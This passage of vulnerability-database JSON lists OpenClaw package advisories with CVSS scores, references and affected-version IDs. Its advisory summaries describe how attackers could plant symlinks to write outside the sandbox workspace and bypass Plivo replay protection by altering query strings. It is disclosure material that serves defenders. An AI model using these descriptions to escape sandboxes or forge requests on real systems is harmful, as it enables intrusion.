:"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:59:02Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a65eb1b864b7630c1242a82de9e5799b80583c3f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2hh7-c75g-qj
2r","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:59:02Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2hh7-c75g-qj2r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44116","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44116"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-zalo-photo-url-validation","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:59:02Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-zalo-photo-url-validation"},{"reference_url":"https://github.com/advisories/GHSA-2hh7-c75g-qj2r","reference_id":"GHSA-2hh7-c75g-qj2r","reference_type":"","scores":[{"value":"
MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2hh7-c75g-qj2r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["CVE-2026-44116","GHSA-2hh7-c75g-qj2r"],"risk_score":3.9,"exploitability":"0.5","weighted_severity":"7.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jshg-1pb2-wbak"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91697?format=json","vulnerability_id":"VCID-jtjv-j6yj-93et","summary":"Duplicate Advisory: OpenClaw: stageSandboxMedia destination symlink traversal can overwrite files outside sandbox workspace\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-cfvj-7rx7-fc7c. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.3.2 contain a vulnerability in the stageSandboxMedia function in which it fails to validate destination symlinks during media staging, allowing writes to follow symlinks outside the sandbox workspace. 
Attackers can exploit this by placing symlinks in the media/inbound directory to overwrite arbitrary files on the host system outside sandbox boundaries.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/17ede52a4be3034f6ec4b883ac6b81ad0101558a","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/17ede52a4be3034f6ec4b883ac6b81ad0101558a"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-stagesandboxmedia-destination","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-stagesandboxmedia-destination"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31990","reference_id":"CVE-2026-31990","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X
/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31990"},{"reference_url":"https://github.com/advisories/GHSA-2cwr-f5hx-gg3w","reference_id":"GHSA-2cwr-f5hx-gg3w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2cwr-f5hx-gg3w"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cfvj-7rx7-fc7c","reference_id":"GHSA-cfvj-7rx7-fc7c","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cfvj-7rx7-fc7c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/978873?format=json","purl":"pkg:npm/openclaw@2026.3.2-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-su
dd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9u
f8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wb
fn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7f
ag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8y
ar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rf
f2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-bu
ga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2-beta.1"}],"aliases":["GHSA-2cwr-f5hx-gg3w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jtjv-j6yj-93et"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90282?format=json","vulnerability_id":"VCID-jtxm-z4vv-cqg7","summary":"Duplicate Advisory: OpenClaw: Plivo V2 verified replay identity drifts on query-only variants\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-cg6c-q2hx-69h7. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.23 contains a replay identity vulnerability in Plivo V2 signature verification that allows attackers to bypass replay protection by modifying query parameters. 
The verification path derives replay keys from the full URL including query strings instead of the canonicalized base URL, enabling attackers to mint new verified request keys through unsigned query-only changes to signed requests.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X
